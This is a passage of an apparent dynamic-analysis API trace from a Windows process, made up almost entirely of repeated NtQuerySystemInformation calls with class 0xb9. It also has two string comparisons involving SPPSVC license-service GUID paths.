SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcca0, Length=0x20, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd308, Length=0x50, ResultLength=0x0) [0206.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0206.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0206.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0206.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0206.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0206.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x28, ResultLength=0x0) [0206.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0206.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd150, Length=0x28, ResultLength=0x0) [0206.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd150, Length=0x28, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x20, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0206.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x20, ResultLength=0x0) [0206.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0206.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0206.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x50, ResultLength=0x0) [0206.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x38, ResultLength=0x0) [0206.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x28, ResultLength=0x0) [0206.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x28, ResultLength=0x0) [0206.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x28, ResultLength=0x0) [0206.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x28, ResultLength=0x0) [0206.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x28, ResultLength=0x0) [0206.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x38, ResultLength=0x0) [0206.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x28, ResultLength=0x0) [0206.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x28, ResultLength=0x0) [0206.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x38, ResultLength=0x0) [0206.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf60, Length=0x20, ResultLength=0x0) [0206.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0206.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0206.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x38, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf60, Length=0x20, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.805] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd198, Length=0x50, ResultLength=0x0) [0206.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0206.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0206.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0206.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf60, Length=0x28, ResultLength=0x0) [0206.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0206.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0206.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0206.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0206.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0206.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0206.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0206.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0206.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x28, ResultLength=0x0) [0206.812] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0206.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0206.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0206.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0206.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd280, Length=0x28, ResultLength=0x0) [0206.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd280, Length=0x28, ResultLength=0x0) [0206.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd280, Length=0x28, ResultLength=0x0) [0206.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0206.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0206.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x28, ResultLength=0x0) [0206.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 